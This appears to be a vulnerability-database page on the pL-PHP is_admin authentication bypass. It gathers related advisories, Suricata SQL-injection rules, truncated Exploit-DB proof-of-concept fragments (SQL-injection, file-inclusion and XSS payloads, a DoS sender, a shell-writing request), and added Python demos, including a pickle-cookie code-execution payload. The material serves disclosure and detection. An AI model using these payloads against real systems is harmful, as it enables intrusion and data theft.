CVE-2007-2007
Published: 2007-04-12
admin.php in pL-PHP beta 0.9 allows remote attackers to bypass authentication by setting the is_admin parameter to 1.
Priority: P3 · 47 · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Flags: EXPLOIT
EPSS: 2.66% (83.8th percentile)
Affected (4 ranges). Note: the three django ranges below match the Django i18n denial-of-service advisory (CVE-2007-5712) listed further down this page; the CVE-2007-2007 description itself concerns pL-PHP only.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| djangoproject | django | >= 0.91.0 < 0.91.1 | 0.91.1 |
| djangoproject | django | >= 0.95 < 0.95.2 | 0.95.2 |
| djangoproject | django | >= 0.96.0 < 0.96.1 | 0.96.1 |
| pl-php | pl-php | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 7.5 | HIGH | — |
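How the bypass works and how to spot it, as an added example in Python. This is not pL-PHP's admin.php, which this page does not show; the mechanism modelled (a privilege flag read from request input instead of server-side state, the usual cause for this bug class) is an assumption, as are the Session type, the admin_page_*() handler names and the access-log lines, which are constructed.

```python
# Added example (Python, not pL-PHP's admin.php): the authorisation mistake
# behind CVE-2007-2007, the fixed form, and a log check for probes.
# Session, admin_page_*() and the log lines are constructed for illustration.
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass
class Session:
    """Server-side state; the client cannot write to it directly."""
    user: str
    is_admin: bool = False


def request_params(url: str) -> dict:
    """Flatten ?a=1&b=2 into {'a': '1', 'b': '2'} (last value wins)."""
    return {k: v[-1] for k, v in parse_qs(urlsplit(url).query).items()}


def admin_page_vulnerable(url: str, session: Session) -> str:
    """Vulnerable pattern: the privilege flag is taken from the request when
    the request supplies one. In register_globals-era PHP a query parameter
    named is_admin becomes the variable $is_admin, so `if ($is_admin == 1)`
    is satisfied by ?is_admin=1 regardless of who is logged in."""
    params = request_params(url)
    is_admin = params.get("is_admin", "1" if session.is_admin else "0")
    return "admin panel" if is_admin == "1" else "403"


def admin_page_fixed(url: str, session: Session) -> str:
    """Fixed pattern: request data is parsed as data only; the privilege
    decision comes from the server-side session and nothing else."""
    request_params(url)  # still parsed for real input, never for authority
    return "admin panel" if session.is_admin else "403"


def bypass_succeeds(handler, session: Session) -> bool:
    """Probe a handler the way the advisory describes: request admin.php
    with is_admin=1 while holding a non-admin session."""
    return handler("/admin.php?is_admin=1", session) == "admin panel"


# Combined-log-format line: ip ident user [time] "METHOD uri proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)


def flag_bypass_attempts(log_lines) -> list:
    """Return (ip, uri, status) for requests to admin.php that carry an
    is_admin parameter. Only GET parameters are visible in an access log;
    a POSTed is_admin needs request-body logging or an inline sensor."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = m["uri"]
        if urlsplit(uri).path.endswith("/admin.php") and "is_admin" in request_params(uri):
            hits.append((m["ip"], uri, int(m["status"])))
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    '203.0.113.7 - - [12/Apr/2007:10:01:02 +0000] "GET /admin.php?is_admin=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Apr/2007:10:01:05 +0000] "GET /index.php?topic=3 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Apr/2007:10:01:09 +0000] "POST /admin.php HTTP/1.1" 403 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    guest = Session(user="guest")
    print("vulnerable handler bypassed:", bypass_succeeds(admin_page_vulnerable, guest))
    print("fixed handler bypassed:     ", bypass_succeeds(admin_page_fixed, guest))
    for hit in flag_bypass_attempts(SAMPLE_LOG):
        print("probe:", hit)
```

A 200 on a flagged request from a host with no prior login is the signal worth paging on; a 403 is a failed probe. The vulnerable handler also shows the flaw cuts both ways: an administrator's own request with ?is_admin=0 is demoted, because the request, not the session, is the authority.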
GHSA
ghsa_unreviewed·2022-05-01
CVE-2007-2007 [HIGH] GHSA-vc9h-qrr4-gm2x: admin
admin.php in pL-PHP beta 0.9 allows remote attackers to bypass authentication by setting the is_admin parameter to 1.
GHSA
ghsa·2022-05-01
CVE-2007-5712 [HIGH] CWE-400 Django vulnerable to Denial of Service via i18n middleware component
The internationalization (i18n) framework in Django 0.91, 0.95, 0.95.1, and 0.96, and as used in other products such as PyLucid, when the USE_I18N option and the i18n component are enabled, allows remote attackers to cause a denial of service (memory consumption) via many HTTP requests with large Accept-Language headers.
Red Hat
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
vendor_redhat·2007-11-06·CVSS 7.5
CVE-2007-5741 [HIGH] plone: python code injection via pickle cookie
Plone 2.5 through 2.5.4 and 3.0 through 3.0.2 allows remote attackers to execute arbitrary Python code via network data containing pickled objects for the (1) statusmessages or (2) linkintegrity module, which the module unpickles and executes.
Statement: Not vulnerable. This issue did not affect versions of plone included in conga/luci packages as shipped with Red Hat Enterprise Linux 5 or Red Hat Cluster Suite for Red Hat Enterprise Linux 4.
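What "unpickles and executes" means in practice, as an added example in Python that is not Plone's code: a cookie carrying a pickle runs attacker-chosen code the moment the server loads it, beside a signed JSON cookie that cannot. The cookie layout, the status-message shape and SECRET_KEY are assumptions for illustration.

```python
# Added example (not Plone's code): pickle-in-cookie deserialisation as
# remote code execution, and a data-only, integrity-checked replacement.
# Cookie layout, message shape and SECRET_KEY are assumptions.
import base64
import hashlib
import hmac
import json
import os
import pickle

SECRET_KEY = b"example-server-secret"  # assumed; generate per deployment in practice


class _RunOnLoad:
    """An object whose pickle calls exec() when loaded. This is what the
    attacker sends; the server never needs this class, only pickle's
    willingness to call any importable callable named in the stream."""
    def __reduce__(self):
        return (exec, ("import os; os.environ['PICKLE_RAN'] = '1'",))


def attacker_cookie() -> str:
    return base64.b64encode(pickle.dumps(_RunOnLoad())).decode()


def read_status_vulnerable(cookie: str):
    """Vulnerable: trusts that the cookie holds a harmless message list.
    pickle.loads executes the stream's instructions before returning."""
    return pickle.loads(base64.b64decode(cookie))


def write_status_fixed(messages) -> str:
    """Fixed writer: JSON body prefixed with an HMAC-SHA256 tag."""
    body = json.dumps(messages, separators=(",", ":")).encode()
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body).decode()


def read_status_fixed(cookie: str):
    """Fixed reader: integrity is checked before any parsing, and the
    format itself (JSON) cannot name code. Returns None for a cookie this
    server did not produce."""
    raw = base64.b64decode(cookie)
    tag, body = raw[:32], raw[32:]
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


def demo_vulnerable() -> bool:
    """True if merely reading the attacker's cookie ran its payload."""
    os.environ.pop("PICKLE_RAN", None)
    read_status_vulnerable(attacker_cookie())
    return os.environ.get("PICKLE_RAN") == "1"


def demo_fixed() -> tuple:
    """(legitimate cookie decoded, attacker cookie rejected)."""
    good = write_status_fixed([{"type": "info", "message": "Changes saved."}])
    return read_status_fixed(good), read_status_fixed(attacker_cookie())


if __name__ == "__main__":
    print("pickle payload executed on load:", demo_vulnerable())
    print("signed JSON reader:", demo_fixed())
```

The payload here only sets an environment variable so the effect is observable; the same `__reduce__` hook can name `os.system` or anything else importable. Signing alone is not the fix either: a signed pickle still executes if the key leaks, which is why the replacement changes the format, not just adds a tag.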
Red Hat
vendor_redhat·2007-01-25·CVSS 4.3
CVE-2007-0494 [MEDIUM] BIND dnssec denial of service
ISC BIND 9.0.x, 9.1.x, 9.2.0 up to 9.2.7, 9.3.0 up to 9.3.3, 9.4.0a1 up to 9.4.0a6, 9.4.0b1 up to 9.4.0b4, 9.4.0rc1, and 9.5.0a1 (Bind Forum only) allows remote attackers to cause a denial of service (exit) via a type * (ANY) DNS query response that contains multiple RRsets, which triggers an assertion error, aka the "DNSSEC Validation" vulnerability.
Cisco
vendor_cisco
CVE-2007-2037: Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points
The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access points using the Lightweight Access Point Protocol (LWAPP). The WLC contains multiple vulnerabilities that could result in a denial of service (DoS) condition, information disclosure, or access control list changes, or allow an attacker to gain full administrative access. Cisco has made free software available to address these vulnerabilities for affected customers. There are
CWE: CWE-264, CWE-399
Bug IDs: CSCse02384, CSCsc90179, CSCsg36361, CSCsg15901, CSCsh10841
Cisco
vendor_cisco
CVE-2007-5584: Application Inspection Vulnerability in Cisco Firewall Services Module
A vulnerability exists in the Cisco Firewall Services Module (FWSM) - a high-speed, integrated firewall module for Cisco Catalyst 6500 switches and Cisco 7600 Series routers, that may result in a reload of the FWSM. The only affected FWSM System Software Version is 3.2(3). There are no known instances of intentional exploitation of this issue. However, Cisco has observed data streams that appear to be unintentionally triggering this vulnerability. Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584 has been assigned to this vulnerability. Cisco will release software updates that address this vulnerability. A workaround that mitigates this vulnerability is available. This advisory is posted
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-1434 [HIGH] ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT"; flow:established,to_server; http.uri; content:"/userdetail.php?"; nocase; content:"id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1434; reference:url,www.securityfocus.com/bid/22911; classtype:web-application-attack; sid:2004350; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_A
Suricata
suricata·2010-07-30·CVSS 6.5
CVE-2007-0122 [MEDIUM] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT"; flow:established,to_server; http.uri; content:"/albmgr.php?"; nocase; content:"cat="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0122; reference:url,www.securityfocus.com/bid/21894; classtype:web-application-attack; sid:2005843; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-1163 [HIGH] ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT"; flow:established,to_server; http.uri; content:"/printview.php?"; nocase; content:"topic="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1163; reference:url,www.milw0rm.com/exploits/3351; classtype:web-application-attack; sid:2004748; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techniqu
Suricata
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004496; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mi
Suricata
suricata·2010-07-30·CVSS 6.0
CVE-2007-1255 [MEDIUM] ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT"; flow:established,to_server; http.uri; content:"/admin.php?"; nocase; content:"uploadimage="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1255; reference:url,www.milw0rm.com/exploits/3352; classtype:web-application-attack; sid:2004705; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_
Suricata
suricata·2010-07-30·CVSS 6.5
CVE-2007-3140 [MEDIUM] ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII"; flow:established,to_server; http.uri; content:"/xmlrpc.php?"; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-3140; reference:url,www.milw0rm.com/exploits/4039; classtype:web-application-attack; sid:2004658; rev:8; metadata:affected_product Web_Server_Applications, affected_product Wordpress, affected_product Wordpress_Plugins, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, tag Wordpress, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-0826 [HIGH] ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT"; flow:established,to_server; http.uri; content:"/forum.asp?"; nocase; content:"forumid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0826; reference:url,www.exploit-db.com/exploits/3278/; classtype:web-application-attack; sid:2004981; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-3293 [HIGH] ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE"; flow:established,to_server; http.uri; content:"/categoria.php?"; nocase; content:"cid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3293; reference:url,www.exploit-db.com/exploits/4082/; classtype:web-application-attack; sid:2006476; rev:11; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_i
Suricata
suricata·2010-07-30·CVSS 6.5
CVE-2007-1254 [MEDIUM] ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"p_skin="; nocase; fast_pattern; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1254; reference:url,www.milw0rm.com/exploits/3352; classtype:web-application-attack; sid:2004711; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-2862 [HIGH] ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII"; flow:established,to_server; http.uri; content:"/cart.inc.php?"; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-2862; reference:url,www.securityfocus.com/archive/1/archive/1/469301/100/0/threaded; classtype:web-application-attack; sid:2004039; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T
Suricata
suricata·2010-07-30·CVSS 7.5
CVE-2007-1428 [HIGH] ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"salary="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1428; reference:url,www.exploit-db.com/exploits/3455/; classtype:web-application-attack; sid:2004378; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Ac
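The ET WEB_SPECIFIC_APPS rules above all use the same content-chain idiom against http.uri. The following is an added example, not part of the ET ruleset or of Suricata, that reimplements just enough of that idiom (ordered `content`, `nocase`, `distance:0`, and the `pcre` used by sids 2004496 and 2004658) to show which URIs three of the listed rules fire on and why the order of UNION and SELECT matters. The sample URIs are constructed; buffer normalisation, fast_pattern selection and flow state are deliberately left out, so this explains the rule logic rather than replacing the engine.

```python
# Added example (not Suricata or ET code): a minimal model of the
# content / nocase / distance:0 / pcre chain used by the rules above.
# Sample URIs are constructed; no HTTP normalisation is performed.
import re
from dataclasses import dataclass
from typing import Optional, Sequence


@dataclass(frozen=True)
class Content:
    pattern: str
    nocase: bool = True
    relative: bool = False  # True models `distance:0`: must start after the previous match


@dataclass(frozen=True)
class Rule:
    sid: int
    msg: str
    contents: Sequence[Content]
    pcre: Optional[str] = None  # applied to the same buffer, case-insensitive


def _find(buf: str, c: Content, start: int) -> int:
    hay, needle = (buf.lower(), c.pattern.lower()) if c.nocase else (buf, c.pattern)
    return hay.find(needle, start)


def rule_matches(rule: Rule, uri: str) -> bool:
    """True if every content is found, honouring relative placement, and
    the optional pcre also matches. An absolute content is searched over
    the whole buffer; a relative one only from the end of the last match."""
    last_end = 0
    for c in rule.contents:
        pos = _find(uri, c, last_end if c.relative else 0)
        if pos < 0:
            return False
        last_end = pos + len(c.pattern)
    if rule.pcre and not re.search(rule.pcre, uri, re.IGNORECASE):
        return False
    return True


# Three of the rules listed on this page, transcribed into the model.
RULES = [
    Rule(2004350, "Grayscale Blog -- userdetail.php id UNION SELECT",
         [Content("/userdetail.php?"), Content("id="), Content("UNION"),
          Content("SELECT", relative=True)]),
    Rule(2004496, "Savas Guestbook -- add2.php name DELETE",
         [Content("/add2.php?"), Content("name="), Content("DELETE")],
         pcre=r"DELETE.+FROM"),
    Rule(2004658, "Wordpress 2.2 -- xmlrpc.php ASCII",
         [Content("/xmlrpc.php?"), Content("SELECT")],
         pcre=r"ASCII\(.+SELECT"),
]


def matching_sids(uri: str) -> list:
    """sids of every modelled rule that fires on the given URI."""
    return [r.sid for r in RULES if rule_matches(r, uri)]


SAMPLE_URIS = [  # constructed
    "/blog/userdetail.php?id=1 UNION SELECT user,pass FROM users",   # fires 2004350
    "/blog/userdetail.php?id=1 SELECT UNION",                        # SELECT precedes UNION: no match
    "/blog/userdetail.php?id=42",                                    # benign
    "/gb/add2.php?name=x'; DELETE FROM entries--",                   # fires 2004496
    "/gb/add2.php?name=DELETE",                                      # pcre needs FROM: no match
    "/xmlrpc.php?x=ASCII(SUBSTRING((SELECT user_pass FROM wp_users),1,1))",  # fires 2004658
]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        print(matching_sids(uri), uri)
```

The second URI is the instructive one: every keyword the Grayscale rule names is present, but `distance:0` on SELECT requires it to start after the UNION match, so the rule stays silent. That is the behaviour the real signature has as well, and it is why these rules are tagged confidence Medium: they describe one syntactic shape of the injection, not the vulnerability.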
Exploit-DB
exploitdb·2010-04-30
CVE-2007-0053 AutoDealer 1.0/2.0 - MSSQL Injection
---
# vendor :http://www.aspsiteware.com/Auto.asp
# Date: 30 apr,2010
# Dork:Copyright © 2010 ASP SiteWare. All rights reserved.
#####################Sid3^effects aKa HaRi##################################
#Greetz to all Andhra Hackers and ICW Members[Indian Cyber Warriors]
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
#ShouTZ:kedar,dec0d3r,41.w4r10r
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Description :
AutoDealer is an application ideal for the small or independent new or used car dealer who needs a way
to display and update their inventory online. Backend by Access database, AutoDealer can store
thousands of vehicles in catego
Exploit-DB
exploitdb·2008-06-03
CVE-2007-5604 HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow
---
source: https://www.securityfocus.com/bid/29529/info
HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
HP Instant Support 1.0.0.22 and earlier versions are affected.
NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own
Exploit-DB
exploitdb·2007-12-13
CVE-2007-6467 MKPortal 1.1 Gallery Module - SQL Injection
---
source: https://www.securityfocus.com/bid/26860/info
MKPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects MKPortal M1.1 RC1; other versions may also be vulnerable.
http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql)
Exploit-DB
exploitdb·2007-10-29
CVE-2007-2217 Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
---
/* MS07-055 Kodak Image Viewer TIF/TIFF Code Execution Proof Of Concept
by Hong Gil-Dong, Jeon Woo-chi
* Hwang-Hee(?~1542), Prime Minister in Korea
* Once upon a time, One servant of Hwang-Hee was arguing with another
* servant. they asked Hwang-Hee to judge who is right.
* Hwang-Hee listened to their story, and said "Both are right".
* We tested this code on Windows 2000 SP4 Korean Edition.
* But if you change some parts of this code, you can also execute an
* arbitrary code in other systems.
* - Caution -
* First, execute the Kodak Image Viewer and then open the ms07-005.tif
* file. If you click the ms07-005.tif file directly in explorer,
* sometimes it causes no execution, just a crash.
*/
#include
#define TIF_FILE "ms07-055
Exploit-DB
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
exploitdb·2007-10-08
CVE-2007-5362 Joomla! Component mosmedialite451 - Remote File Inclusion
---
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : MOSMediaLite451
Discovered By : k1n9k0ng
Scripts site : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );
bug found:
"http://www.site.net/administrator/components/com_mosmedia/includ
Exploit-DB
exploitdb·2007-09-23
CVE-2007-5099 helplink 0.1.0 - 'show.php' Remote File Inclusion
---
##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability #
# D.S : http://sourceforge.net/projects/helplink/ #
# V.C #
================================show.php=================================#
01 : #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3 #
##########################################################################
# milw0rm.com [2007-09-23]
Exploit-DB
exploitdb·2007-08-30
CVE-2007-4646 Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)
---
# milw0rm.com [2007-08-30]
Exploit-DB
exploitdb·2007-07-31
CVE-2007-3844 Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution
---
source: https://www.securityfocus.com/bid/25142/info
Mozilla Firefox, Thunderbird, and SeaMonkey are prone to a vulnerability that allows JavaScript to execute with unintended privileges.
A malicious site may be able to cause the execution of a script with Chrome privileges. Attackers could exploit this issue to execute hostile script code with privileges that exceed those that were intended. Certain Firefox extensions may not intend 'about:blank' to execute script code with Chrome privileges.
NOTE: This issue was introduced by the fix for MFSA 2007-20.
The following proof of concept is available:
w=open("about:blank");alert(1);u="javascript:alert(Components.stack);";w.document.body.innerHTML=u.li
Exploit-DB
exploitdb·2007-06-04
CVE-2007-3098 SNMPc 7.0.18 - Remote Denial of Service (Metasploit)
---
##
# $Id: snmpc.rb 2007-06-03 $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Snmpc 'SNMPc ',
'Description' => %q{
This module sends a specially-crafted packet to the service login of snmpc
causing a denial of service of snmpc.
},
'Author' => [ 'En Douli, Tks to OaiTeam ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'CVE', 'XXXXXXX' ],
]))
register_options([Opt::RPORT(165),], self.class)
end
def run
connect
init
Exploit-DB
exploitdb·2007-05-12
CVE-2007-2718 CommuniGate Pro 5.1.8 - Web Mail HTML Injection
---
source: https://www.securityfocus.com/bid/23950/info
CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
CommuniGate Pro 5.1.8 and earlier versions are vulnerable to this issue.
Note that this issue is present only when using Microsoft Internet Explorer.
@im\port'\ja\vasc\ript:alert("XSS in message body (style using import)")';
Exploit-DB
exploitdb·2007-05-04
CVE-2007-2537 Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)
---
")."&Xfiles=header_head&confirm=Sauver+les+modifications")."\r\n\r\n";
$reqshell .= "Xtxt=".urlencode("")."&Xfiles=header_before&confirm=Sauver+les+modifications";
fwrite($sock, $reqshell);
unset($reqshell);
$pageshell = '';
while(!feof($sock)) {
$pageshell .= fgets($sock);
}
fclose($sock);
